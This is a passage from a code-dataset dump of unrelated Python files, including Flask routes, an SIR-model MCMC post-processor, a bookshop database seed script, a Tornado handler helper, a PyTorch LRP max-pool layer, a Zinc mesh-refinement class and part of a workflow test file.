get_edit_incoming()\n return edit_node('commands', incoming_data)\n\n\n@it_planning_app.route('/itPlanningAdd', methods=[\"POST\", \"GET\"])\n@is_logged_in\ndef adding_node():\n incoming_data = get_add_incoming()\n return add_node('commands', incoming_data)\n\n\n@it_planning_app.route('/itPlanningRemove', methods=[\"POST\", \"GET\"])\n@is_logged_in\ndef removing_node():\n incoming_data = get_remove_incoming()\n return remove_node('commands', incoming_data)\n\n\n@it_planning_app.route('/itPlanningChange_goals', methods=[\"POST\", \"GET\"])\n@is_logged_in\ndef redacting_goals_node():\n incoming_data = get_edit_incoming()\n return edit_node(\"goals\", incoming_data)\n\n\n@it_planning_app.route('/itPlanningAdd_goals', methods=[\"POST\", \"GET\"])\n@is_logged_in\ndef adding_goals_node():\n incoming_data = get_add_incoming()\n return add_node(\"goals\", incoming_data)\n\n\n@it_planning_app.route('/itPlanningRemove_goals', methods=[\"POST\", \"GET\"])\n@is_logged_in\ndef removing_goals_node():\n incoming_data = get_remove_incoming()\n return remove_node(\"goals\", incoming_data)\n","sub_path":"it_planning/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"73614618","text":"'''\nThis class contains functions to\n1) run_MCMC(): execute the MCMC algorithm for SIR models,and save results\n2) load_data(): load nummerical results (the Markov Chain)\n3) report(): compute the marginal likelihood\n4) remove_burning (): remove first smaples of the chain\n5) plot (): for visualize the obtain results\n'''\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom SIRparamIden import SirIden as SirIden\nfrom SIRparamIden import simpleSirIden as simpleSirIden\nfrom xSIRparamIden import hyperSirIden as hyperSirIden\nfrom uqVisual import uqPlot\nimport genLib as genLib\nfrom AlgorithmPram import AlgorithmParam as AlgParam\n\n\nclass postProcessing(AlgParam):\n def __init__(self,country_region,model, **kwargs):\n AlgParam.__init__(self, country_region)\n self.model = model\n if model == 'SIR':\n self.SIR = SirIden(country_region= self.country_region) \n elif model =='simSIR':\n self.SIR = simpleSirIden(country_region= self.country_region) \n #gammaSize = 1\n elif model == 'hyperSIR':\n self.SIR = hyperSirIden(initT, deltaT, N, n_MC = self.n_MC, kernel_std_ratio = self.kernel_std_ratio, country_region= self.country_region, observation_deltaT = 14) \n \n if 'loadInit' in kwargs.keys():\n self.loadInit = kwargs['loadInit']\n self.ithrun = kwargs['ithrun']\n if self.loadInit:\n self.filename = model +country_region + str(self.ithrun)\n self.loadfile = model +country_region + str(self.ithrun-1)\n if self.ithrun == 1:\n self.loadfile = model +country_region\n else: self.loadInit = 0\n if self.loadInit == 0:\n self.filename = model + country_region\n f = plt.figure()\n self.SIR.LikelihoodFunc.plotLikelihood()\n f.savefig(self.result_dir+'likelihoodfunction.pdf',bbox_inches='tight')\n self.observationTime4Val = self.SIR.time[np.arange(5,self.SIR.time.size, 20, dtype = int )]\n \n\n def run_mcmc (self,**kwargs):\n #### Perform MCMC\n if self.loadInit == 0:\n np.random.seed(100)\n x_init = self.SIR.prior_pdf_rvs()\n print (x_init)\n print(self.SIR.x2theta_x0(x_init))\n x_init[0:self.SIR.theta_dim//2] = np.log(0.2)\n x_init[self.SIR.theta_dim//2:self.SIR.theta_dim] = np.log(0.2)\n else:\n x_prev = self.load_data(self.result_dir+self.loadfile)\n x_init = np.mean(x_prev, axis = 0)\n x = self.SIR.run_MCMC(x_init = x_init)\n #### End MCMC process\n \n np.save(self.result_dir+self.filename+'.npy', x)\n xremovedBurning = self.remove_burning(x)\n self.report(xremovedBurning)\n self.plot(xremovedBurning)\n return xremovedBurning\n def report(self,xremovedBurning, **kwargs):\n scaledBC, logscaledConst = self.SIR.modelBayesCriterion(xremovedBurning, observationTime = self.observationTime4Val)\n print ('marginal Likelihood', np.exp(np.log(scaledBC) + logscaledConst)) \n if self.loadInit:\n filename = self.model + self.country_region + str(self.ithrun) + 'Cont.csv' \n else:\n filename = self.model + self.country_region +'.csv' \n genLib.report(filename, model = self.model, country_region = self.country_region, initT = self.SIR.initT, N = self.SIR.N,\n n_MC = self.SIR.n_MC,\n deltaT = self.SIR.deltaT, observation_deltaT = self.SIR.observation_deltaT,\n scaledBC= scaledBC, logscaledConst= logscaledConst,\n #executionTime = self.SIR.executionTime,\n marginalLikelihood = np.exp(np.log(scaledBC) + logscaledConst),x_mean = xremovedBurning.mean(axis =0))\n ####\n def remove_burning(self,x):\n return x[-self.n_MC_keep:,:]\n def load_data(self,loadfile):\n x = np.load(loadfile+'.npy')\n xremovedBurning = self.remove_burning(x)\n return xremovedBurning\n def plot(self,x,qtPlot = 0.95): \n x_mean = x.mean(axis = 0)\n if self.model != 'hyperSIR':\n logthetaM, x0M = self.SIR.x2theta_x0(x_mean)\n else:\n logthetaM, x0M, hyperParam = self.SIR.x2theta_x0(x_mean)\n \n print (x_mean)\n fxmean = self.SIR.interpolate_theta(logthetaM)\n plt.figure('beta')\n plt.plot(self.SIR.model.time,(fxmean[0,:]))\n plt.figure('gamma')\n plt.plot(self.SIR.model.time,(fxmean[1,:]))\n \n plt.figure('mean value') \n self.SIR.plot(x_mean)\n plt.xlim ([0, self.SIR.time_4_eval_marginal_likelihood.max() + self.SIR.initT])\n plt.ylim([0,self.SIR.data.confirmed.max()])\n plt.legend()\n \n f= plt.figure('ACF Beta')\n steps = np.arange(0,1000,1,dtype = int)\n uqPlot.autocorrelation(x[:,0],steps)\n f.savefig(self.result_dir+self.model + self.country_region + \"ACFBeta.pdf\", bbox_inches='tight')\n plt.show()\n \n \n \n #Posprocessing data \n active_cases_posterior_samples = np.zeros(shape = (x.shape[0], self.SIR.model.time.size ))# infection and recovered\n total_infections_posterior_samples = np.zeros(shape = (x.shape[0], self.SIR.model.time.size ))# infection and recovered\n beta = np.zeros(shape = (x.shape[0], self.SIR.time_node.size ))# infection and recovered\n gamma = np.zeros(shape = (x.shape[0],self.SIR.time_node.size ))# infection and recovered = np.zeros(shape = (x.shape[0],SIR.time_node.size ))# infection and recovered\n if self.model == 'hyperSIR':\n alpha = np.zeros(shape = (x.shape[0],self.SIR.priorHyperParamDim))# infection and recovered\n \n for i in range(x.shape[0]):\n if self.model != 'hyperSIR':\n theta, x0 = self.SIR.x2theta_x0(x[i,:])\n else:\n theta, x0, hyperParam = self.SIR.x2theta_x0(x[i,:])\n if self.model == 'SIR':\n beta[i,:] = np.exp(theta[0,:])\n gamma[i,:] = np.exp(theta[1,:])\n elif self.model =='simSIR':\n beta[i,:] = np.exp(theta[0:-1])\n gamma[i,:] = np.exp(theta[-1])*np.ones_like(gamma[i,:]) \n elif self.model == 'hyperSIR':\n beta[i,:] = np.exp(theta[0,:])\n gamma[i,:] = np.exp(theta[1,:])\n alpha[i,:] = hyperParam\n \n self.SIR.model.theta = self.SIR.interpolate_theta(theta)\n self.SIR.model.initCondition= x0\n self.SIR.model.eval()\n active_cases_posterior_samples[i,:] = self.SIR.model.state[1,:]\n total_infections_posterior_samples[i,:] = self.SIR.model.state[1,:] + self.SIR.model.state[2,:]\n f=plt.figure('Active cases')\n uqPlot.quantilePlot(active_cases_posterior_samples, self.SIR.model.time + self.SIR.initT, qtPlot)\n plt.plot(self.SIR.data.confirmed -self.SIR.data.deaths - self.SIR.data.recovered, '*-', label = 'data' )\n plt.legend(fontsize=15)\n plt.xlabel('day', fontsize= 18)\n plt.ylabel('active cases', fontsize= 18)\n f.savefig(self.result_dir+self.model + self.country_region + \"ActiveCases.pdf\", bbox_inches='tight')\n plt.show()\n \n f = plt.figure('Total infected cases')\n uqPlot.quantilePlot(total_infections_posterior_samples, self.SIR.model.time + self.SIR.initT, qtPlot)\n plt.plot(self.SIR.data.confirmed, '*-', label = 'data' )\n plt.legend(fontsize=15)\n plt.xlabel('day', fontsize= 18)\n plt.ylabel('Cumulative infections', fontsize= 18)\n f.savefig(self.result_dir+self.model + self.country_region +\"totalCases.pdf\", bbox_inches='tight')\n plt.show()\n \n f = plt.figure('beta')\n uqPlot.quantilePlot(beta, self.SIR.time_node + self.SIR.initT, qtPlot)\n plt.legend(fontsize=15)\n plt.xlabel('day', fontsize= 18)\n plt.ylabel(r'$\\beta$', fontsize= 18)\n if self.country_region == 'Germany':\n plt.ylim([0.0, 0.8])\n if self.country_region == 'Uruguay':\n plt.ylim([0., 1.])\n if self.country_region == 'Saudi Arabia':\n plt.ylim([0.02, 0.18])\n if self.country_region == 'Italy':\n plt.ylim([0, 0.35])\n f.savefig(self.result_dir+self.model + self.country_region +\"beta.pdf\", bbox_inches='tight')\n plt.show()\n \n f = plt.figure('gamma')\n uqPlot.quantilePlot(gamma, self.SIR.time_node + self.SIR.initT, qtPlot)\n plt.legend(fontsize=15)\n plt.xlabel('day', fontsize= 18)\n plt.ylabel(r'$\\gamma$', fontsize= 18)\n if self.country_region == 'Germany':\n plt.ylim([0.0, 0.8])\n if self.country_region == 'Uruguay':\n plt.ylim([0., 0.55])\n if self.country_region == 'Saudi Arabia':\n plt.ylim([0, 0.14])\n if self.country_region == 'Italy':\n plt.ylim([0, 0.1])\n f.savefig(self.result_dir+self.model + self.country_region + \"gamma.pdf\", bbox_inches='tight')\n \n \n if self.model == 'hyperSIR':\n f = plt.figure('alpha')\n uqPlot.kde(alpha[:,0])\n plt.legend()\n plt.xlabel(r'$\\alpha$', fontsize= 18)\n plt.ylabel('pdf', fontsize= 18)\n f.savefig(self.result_dir+self.model + self.country_region + \"alpha.pdf\", bbox_inches='tight')\n plt.show() \n print('end')","sub_path":"postProcessing.py","file_name":"postProcessing.py","file_ext":"py","file_size_in_byte":9478,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"184222644","text":"import datetime\n\n__author__ = 'matvei'\n\nfrom bookshop import db\nfrom models.books.models import Author, Book, BookInLibrary\nfrom models.files.models import File\nfrom models.messages.models import Message\nfrom models.news.models import News\nfrom models.users.models import Role, User, Follower\ndb.create_all()\n\nfrom models.books.models import Author, Book, BookInLibrary, Genre, Comment\nfrom models.news.models import News\nfrom models.users.models import User, Role\n\nannotation = 'Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor ' \\\n 'incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud ' \\\n 'exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute ' \\\n 'irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla ' \\\n 'pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia '\n\nrole1 = Role('admin', 'god')\nrole2 = Role('editor', 'can add news books authors')\nrole3 = Role('user', 'slave')\n\ndb.session.add(role1)\ndb.session.add(role2)\ndb.session.add(role3)\ndb.session.commit()\n\nadmin = User('admin', 'admin@example.com', \"11111\", [role1, role2], 'Admin', 'Admin')\nguest = User('guest', 'guest@example.com', \"22222\", [role2, role3], 'User', 'User')\nguest1 = User('matvei', 'a@aa.aaa', \"1\", [role3], 'Matvei', 'Nazaruk')\n\ndb.session.add(admin)\ndb.session.add(guest)\ndb.session.add(guest1)\ndb.session.commit()\n\ncontent1 = 'Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor ' \\\n 'incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud ' \\\n 'exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute ' \\\n 'irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla ' \\\n 'pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia ' \\\n 'deserunt mollit anim id est laborum.'\ncontent2 = 'Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt' \\\n ' ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ' \\\n 'ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit' \\\n ' in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat' \\\n ' cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.'\ncontent3 = 'Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt' \\\n ' ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ' \\\n 'ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit' \\\n ' in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat' \\\n ' cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.'\nnews1 = News(\"Lorem ipsum dolor sit amet\", content1, admin.id, main_img='http://www.whydev.org/wp-content/uploads/2014/09/Books.jpg')\nnews2 = News(\"Foo Bar Baz\", content2, admin.id, main_img='http://upload.wikimedia.org/wikipedia/commons/7/76/Urval_av_de_bocker_som_har_vunnit_Nordiska_radets_litteraturpris_under_de_50_ar_som_priset_funnits_(2).jpg')\nnews3 = News(\"news 3333333\", content3, guest.id, main_img='http://static.squarespace.com/static/5148b660e4b030ab54aef81c/t/5473b990e4b0f2adb15dc47c/1416870295741/?format=1000w')\n\ndb.session.add(news1)\ndb.session.add(news2)\ndb.session.add(news3)\ndb.session.commit()\n\nauthor1 = Author(first_name='Jack', last_name='London', country='England')\nauthor2 = Author(first_name='William', last_name='Shakespeare', country='England')\n\ndb.session.add(author2)\ndb.session.add(author1)\ndb.session.commit()\n\ngenre1 = Genre('Sci-fi')\ngenre2 = Genre('Fantasy')\ngenre3 = Genre('Drama')\ngenre4 = Genre('Comic')\n\ndb.session.add(genre1)\ndb.session.add(genre2)\ndb.session.add(genre3)\ndb.session.add(genre4)\ndb.session.commit()\n\nbook1 = Book('Martin Iden', author1.id, \"1900-10\", [genre1], annotation, 'http://www.images-booknode.com/book_cover/4220/full/martin-eden-4220412.jpg')\nbook2 = Book('Beliy Klyk', author1.id, \"1905-1\", [genre2], annotation, 'http://upload.wikimedia.org/wikipedia/commons/1/14/JackLondonwhitefang1.jpg')\nbook3 = Book('Gamlet', author2.id, \"1828-3\", [genre3, genre4], annotation, 'http://th05.deviantart.net/fs70/PRE/i/2012/053/8/a/hamlet_book_cover_complete_by_syrihn-d4qoci9.jpg')\nbook4 = Book('King Lear', author2.id, \"1834-4\", [genre1, genre2], annotation,'http://ecx.images-amazon.com/images/I/51Rg2yW-xXL.jpg')\n\ndb.session.add(book1)\ndb.session.add(book2)\ndb.session.add(book3)\ndb.session.add(book4)\ndb.session.commit()\n\nbook_comment = Comment(book3.id, guest.id, guest.username, 'OMG!!! WTF!!!')\n\ndb.session.add(book_comment)\ndb.session.commit()\n\nuser1_book1 = BookInLibrary(book1.id, admin.id)\nuser1_book2 = BookInLibrary(book3.id, admin.id)\ndb.session.add(user1_book1)\ndb.session.add(user1_book2)\ndb.session.commit()\n","sub_path":"out_date/apps/db_init_fill.py","file_name":"db_init_fill.py","file_ext":"py","file_size_in_byte":5157,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"367023336","text":"#!/usr/bin/env python\n#\n# Copyright 2009 Facebook\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport tornado.httpserver\nimport tornado.ioloop\nimport inspect, new\nimport tornado.web\n\ndef expose_get(url):\n def wrap(f):\n def wrapped_f(*args):\n f(*args)\n wrapped_f.method = 'get'\n wrapped_f.url = url\n return wrapped_f\n return wrap\n\ndef expose_post(url):\n def wrap(f):\n def wrapped_f(*args):\n f(*args)\n wrapped_f.method = 'post'\n wrapped_f.url = url\n return wrapped_f\n return wrap\n\ndef start_class(obj):\n handlers = []\n obj = obj()\n for name in dir(obj):\n if name[0:2] == '__' or not callable(getattr(obj, name)):\n continue\n func = getattr(obj, name)\n if func.__name__ != expose_post.__name__ and func.__name__ != expose_get.__name__:\n _name = \"EasyRequestHandler-\" + func.url\n methods_dict = { func.method : func }\n _class = new.classobj(_name,(tornado.web.EasyRequestHandler, ), methods_dict)\n handlers.append((func.url, _class))\n return handlers\n\ndef start_module(mod_name):\n handlers = []\n mod = __import__(mod_name)\n for name in dir(mod):\n obj = getattr(mod, name)\n if inspect.isclass(obj):\n if hasattr(obj, 'target'):\n obj.__bases__ = (tornado.web.RequestHandler,)\n handlers.append((obj.target, obj))\n if inspect.isfunction(obj):\n if obj.__name__ != expose_post.__name__ and obj.__name__ != expose_get.__name__ and obj.__name__ != 'start':\n _name = \"Handler-\" + obj.url\n methods_dict = { obj.method : obj }\n _class = new.classobj(_name,(tornado.web.RequestHandler, ), methods_dict)\n handlers.append((obj.url, _class))\n return handlers\n\ndef start(obj, settings={}, port=8888):\n handlers = []\n if inspect.isclass(obj):\n handlers = start_class(obj)\n else:\n handlers = start_module(obj)\n \n application = tornado.web.Application(handlers, **settings)\n http_server = tornado.httpserver.HTTPServer(application)\n http_server.listen(port)\n tornado.ioloop.IOLoop.instance().start()\n\n","sub_path":"tornado/contrib/easy_app.py","file_name":"easy_app.py","file_ext":"py","file_size_in_byte":2759,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"235851067","text":"import numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.autograd import Function\nfrom torch.autograd import Variable\n\ndef where(condition, x, y):\n return Variable(condition.float()) * x + Variable((condition != 1).float()) * y\n\nclass MaxPool2d(nn.Module):\n def __init__(self, kernel_size):\n super(MaxPool2d, self).__init__()\n self.kernel_size = kernel_size\n self.layer = nn.MaxPool2d(self.kernel_size)\n\n def forward(self, input_tensor):\n self.in_N, self.in_depth, self.in_h, self.in_w = input_tensor.size()\n return self.layer.forward(input_tensor)\n #\n def lrp(self, R, lrp_var=None,param=None):\n if lrp_var is None or lrp_var.lower() == 'none' or lrp_var.lower() == 'simple':\n return self._simple_lrp(R)\n elif lrp_var.lower() == 'alphabeta' or lrp_var.lower() == 'alpha':\n return self._alphabeta_lrp(R, param)\n\n def _simple_lrp(self, R):\n self.check_shape(R)\n\n hpool = wpool = self.layer.kernel_size\n hstride = wstride = self.layer.stride\n\n Rx = torch.zeros(self.input.size())\n for i in range(self.Hout):\n for j in range(self.Wout):\n # Z = torch.eq(self.output[:, :, i:i+1, j:j + 1], self.input[:, :, i * hstride:i * hstride + hpool, j * wstride:j * wstride + wpool])\n # Z = where(Z, torch.ones_like(Z.float()), torch.zeros_like(Z.float()))\n Z = self.input[:, :, i * hstride:i * hstride + hpool, j * wstride:j * wstride + wpool]\n Zs = (torch.sum(torch.sum(Z, dim=2, keepdim=True),dim=3, keepdim=True))\n Zs += 1e-12 * where(Zs >= 0, torch.ones_like(Zs), torch.ones_like(Zs) * -1)\n\n Rx[:, :, i * hstride:i * hstride + hpool, j * wstride:j * wstride + wpool] += torch.div(Z, Zs) * self.R[:, :, i:i + 1, j:j + 1]\n return Rx\n\n def _alphabeta_lrp(self,R,alpha):\n return self._simple_lrp(R)\n\n def check_shape(self, R):\n self.R = R\n R_shape = self.R.size()\n output_shape = self.output.size()\n if len(R_shape) != 4:\n self.R = torch.reshape(self.R, output_shape)\n N, NF, self.Hout, self.Wout = self.R.size()","sub_path":"modules/Maxpool.py","file_name":"Maxpool.py","file_ext":"py","file_size_in_byte":2194,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"271407793","text":"'''\nClass for refining a mesh from one region to another.\nCreated on April 4, 2018\n\n@author: Richard Christie\n'''\n\nfrom scaffoldmaker.annotation.annotationgroup import AnnotationGroup\nfrom scaffoldmaker.utils.octree import Octree\nfrom scaffoldmaker.utils.zinc_utils import *\nfrom opencmiss.zinc.element import Element, Elementbasis\nfrom opencmiss.zinc.field import Field\nfrom opencmiss.zinc.node import Node\nfrom opencmiss.zinc.result import RESULT_OK as ZINC_OK\n\nclass MeshRefinement:\n '''\n Class for refining a mesh from one region to another.\n '''\n\n def __init__(self, sourceRegion, targetRegion, sourceAnnotationGroups = []):\n '''\n Assumes targetRegion is empty.\n :param sourceAnnotationGroups: List of AnnotationGroup for source mesh in sourceRegion.\n A copy containing the refined elements is created by the MeshRefinement.\n '''\n self._sourceRegion = sourceRegion\n self._sourceFm = sourceRegion.getFieldmodule()\n self._sourceCache = self._sourceFm.createFieldcache()\n self._sourceCoordinates = getOrCreateCoordinateField(self._sourceFm)\n # get range of source coordinates for octree range\n self._sourceFm.beginChange()\n sourceNodes = self._sourceFm.findNodesetByFieldDomainType(Field.DOMAIN_TYPE_NODES)\n minimumsField = self._sourceFm.createFieldNodesetMinimum(self._sourceCoordinates, sourceNodes)\n result, minimums = minimumsField.evaluateReal(self._sourceCache, 3)\n assert result == ZINC_OK, 'MeshRefinement failed to get minimum coordinates'\n maximumsField = self._sourceFm.createFieldNodesetMaximum(self._sourceCoordinates, sourceNodes)\n result, maximums = maximumsField.evaluateReal(self._sourceCache, 3)\n assert result == ZINC_OK, 'MeshRefinement failed to get maximum coordinates'\n xrange = [ (maximums[i] - minimums[i]) for i in range(3) ]\n edgeTolerance = 0.5*(max(xrange))\n if edgeTolerance == 0.0:\n edgeTolerance = 1.0\n minimums = [ (minimums[i] - edgeTolerance) for i in range(3) ]\n maximums = [ (maximums[i] + edgeTolerance) for i in range(3) ]\n minimumsField = None\n maximumsField = None\n self._sourceFm.endChange()\n self._sourceMesh = self._sourceFm.findMeshByDimension(3)\n self._sourceElementiterator = self._sourceMesh.createElementiterator()\n self._octree = Octree(minimums, maximums)\n\n self._targetRegion = targetRegion\n self._targetFm = targetRegion.getFieldmodule()\n self._targetFm.beginChange()\n self._targetCache = self._targetFm.createFieldcache()\n self._targetCoordinates = getOrCreateCoordinateField(self._targetFm)\n\n self._targetNodes = self._targetFm.findNodesetByFieldDomainType(Field.DOMAIN_TYPE_NODES)\n self._nodetemplate = self._targetNodes.createNodetemplate()\n self._nodetemplate.defineField(self._targetCoordinates)\n\n self._targetMesh = self._targetFm.findMeshByDimension(3)\n self._targetBasis = self._targetFm.createElementbasis(3, Elementbasis.FUNCTION_TYPE_LINEAR_LAGRANGE)\n self._targetEft = self._targetMesh.createElementfieldtemplate(self._targetBasis)\n self._targetElementtemplate = self._targetMesh.createElementtemplate()\n self._targetElementtemplate.setElementShapeType(Element.SHAPE_TYPE_CUBE)\n result = self._targetElementtemplate.defineField(self._targetCoordinates, -1, self._targetEft)\n\n self._nodeIdentifier = 1\n self._elementIdentifier = 1\n\n self._annotationGroups = []\n self._sourceAndTargetMeshGroups = []\n for sourceAnnotationGroup in sourceAnnotationGroups:\n sourceMeshGroup = sourceAnnotationGroup.getMeshGroup(self._sourceMesh)\n targetAnnotationGroup = AnnotationGroup(self._targetRegion, \\\n sourceAnnotationGroup.getName(), sourceAnnotationGroup.getFMANumber(), sourceAnnotationGroup.getLyphID())\n targetMeshGroup = targetAnnotationGroup.getMeshGroup(self._targetMesh)\n self._annotationGroups.append(targetAnnotationGroup)\n self._sourceAndTargetMeshGroups.append( ( sourceMeshGroup, targetMeshGroup) )\n\n def __del__(self):\n self._targetFm.endChange()\n\n def getAnnotationGroups(self):\n return self._annotationGroups\n\n def refineElementCubeStandard3d(self, sourceElement, numberInXi1, numberInXi2, numberInXi3):\n meshGroups = []\n for sourceAndTargetMeshGroup in self._sourceAndTargetMeshGroups:\n if sourceAndTargetMeshGroup[0].containsElement(sourceElement):\n meshGroups.append(sourceAndTargetMeshGroup[1])\n # create nodes\n nids = []\n xi = [ 0.0, 0.0, 0.0 ]\n for k in range(numberInXi3 + 1):\n xi[2] = k/numberInXi3\n for j in range(numberInXi2 + 1):\n xi[1] = j/numberInXi2\n for i in range(numberInXi1 + 1):\n xi[0] = i/numberInXi1\n self._sourceCache.setMeshLocation(sourceElement, xi)\n result, x = self._sourceCoordinates.evaluateReal(self._sourceCache, 3)\n nodeId = self._octree.findObjectByCoordinates(x)\n if nodeId is None:\n node = self._targetNodes.createNode(self._nodeIdentifier, self._nodetemplate)\n self._targetCache.setNode(node)\n result = self._targetCoordinates.setNodeParameters(self._targetCache, -1, Node.VALUE_LABEL_VALUE, 1, x)\n nodeId = self._nodeIdentifier\n self._octree.addObjectAtCoordinates(x, nodeId)\n self._nodeIdentifier += 1\n nids.append(nodeId)\n # create elements\n for k in range(numberInXi3):\n ok = (numberInXi2 + 1)*(numberInXi1 + 1)\n for j in range(numberInXi2):\n oj = (numberInXi1 + 1)\n for i in range(numberInXi1):\n bni = k*ok + j*oj + i\n element = self._targetMesh.createElement(self._elementIdentifier, self._targetElementtemplate)\n enids = [ nids[bni ], nids[bni + 1], nids[bni + oj], nids[bni + oj + 1],\n nids[bni + ok], nids[bni + ok + 1], nids[bni + ok + oj], nids[bni + ok + oj + 1] ]\n result = element.setNodesByIdentifier(self._targetEft, enids)\n #if result != ZINC_OK:\n #print('Element', self._elementIdentifier, result, enids)\n self._elementIdentifier += 1\n\n for meshGroup in meshGroups:\n meshGroup.addElement(element)\n\n\n def refineAllElementsCubeStandard3d(self, numberInXi1, numberInXi2, numberInXi3):\n element = self._sourceElementiterator.next()\n while element.isValid():\n self.refineElementCubeStandard3d(element, numberInXi1, numberInXi2, numberInXi3)\n element = self._sourceElementiterator.next()\n","sub_path":"scaffoldmaker/utils/meshrefinement.py","file_name":"meshrefinement.py","file_ext":"py","file_size_in_byte":7060,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"604799795","text":"# Copyright 2021 Curtin University\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n# Author: James Diprose, Aniek Roelofs\n\nimport os\nfrom typing import List, Dict\nfrom unittest import TestCase\nfrom unittest.mock import patch\n\nimport jsonlines\nimport pandas as pd\nimport pendulum\nimport vcr\nfrom airflow.models.connection import Connection\nfrom airflow.utils.state import State\nfrom click.testing import CliRunner\n\nimport academic_observatory_workflows.workflows.oa_web_workflow\nfrom academic_observatory_workflows.config import schema_folder, test_fixtures_folder\nfrom academic_observatory_workflows.tests.test_zenodo import MockZenodo\nfrom academic_observatory_workflows.workflows.oa_web_workflow import (\n Description,\n OaWebWorkflow,\n OaWebRelease,\n clean_ror_id,\n clean_url,\n fetch_institution_logo,\n make_logo_url,\n val_empty,\n make_entity_stats,\n Entity,\n PublicationStats,\n EntityStats,\n EntityHistograms,\n Histogram,\n load_data,\n preprocess_index_df,\n preprocess_data_df,\n make_index_df,\n make_entities,\n save_entities,\n update_index_with_logos,\n update_df_with_percentages,\n make_index,\n save_json,\n load_data_glob,\n save_jsonl_gz,\n)\nfrom observatory.platform.bigquery import bq_find_schema\nfrom observatory.platform.files import load_jsonl\nfrom observatory.platform.gcs import gcs_upload_file\nfrom observatory.platform.observatory_config import Workflow\nfrom observatory.platform.observatory_environment import (\n ObservatoryEnvironment,\n ObservatoryTestCase,\n Table,\n bq_load_tables,\n make_dummy_dag,\n)\n\nacademic_observatory_workflows.workflows.oa_web_workflow.INCLUSION_THRESHOLD = {\"country\": 0, \"institution\": 0}\n\n\nclass TestFunctions(TestCase):\n def test_val_empty(self):\n # Empty list\n self.assertTrue(val_empty([]))\n\n # Non empty list\n self.assertFalse(val_empty([1, 2, 3]))\n\n # None\n self.assertTrue(val_empty(None))\n\n # Empty string\n self.assertTrue(val_empty(\"\"))\n\n # Non Empty string\n self.assertFalse(val_empty(\"hello\"))\n\n def test_clean_ror_id(self):\n actual = clean_ror_id(\"https://ror.org/02n415q13\")\n expected = \"02n415q13\"\n self.assertEqual(actual, expected)\n\n def test_clean_url(self):\n url = \"https://www.auckland.ac.nz/en.html\"\n expected = \"https://www.auckland.ac.nz/\"\n actual = clean_url(url)\n self.assertEqual(expected, actual)\n\n def test_make_logo_url(self):\n expected = \"logos/country/s/1234.jpg\"\n actual = make_logo_url(entity_type=\"country\", entity_id=\"1234\", size=\"s\", fmt=\"jpg\")\n self.assertEqual(expected, actual)\n\n @patch(\"academic_observatory_workflows.workflows.oa_web_workflow.make_logo_url\")\n def test_get_institution_logo(self, mock_make_url):\n mock_make_url.return_value = \"logo_path\"\n mock_clearbit_ref = \"academic_observatory_workflows.workflows.oa_web_workflow.clearbit_download_logo\"\n\n def download_logo(company_url, file_path, size, fmt):\n if not os.path.isdir(os.path.dirname(file_path)):\n os.makedirs(os.path.dirname(file_path))\n with open(file_path, \"w\") as f:\n f.write(\"foo\")\n\n ror_id, url, size, width, fmt, build_path = \"ror_id\", \"url.com\", \"size\", 10, \"fmt\", \"build_path\"\n with CliRunner().isolated_filesystem():\n # Test when logo file does not exist yet and logo download fails\n with patch(mock_clearbit_ref) as mock_clearbit_download:\n actual_ror_id, actual_logo_path = fetch_institution_logo(ror_id, url, size, width, fmt, build_path)\n self.assertEqual(ror_id, actual_ror_id)\n self.assertEqual(\"unknown.svg\", actual_logo_path)\n mock_clearbit_download.assert_called_once_with(\n company_url=url,\n file_path=\"build_path/images/logos/institution/size/ror_id.fmt\",\n size=width,\n fmt=fmt,\n )\n mock_make_url.assert_not_called()\n\n mock_make_url.reset_mock()\n\n # Test when logo file does not exist yet and logo is downloaded successfully\n with 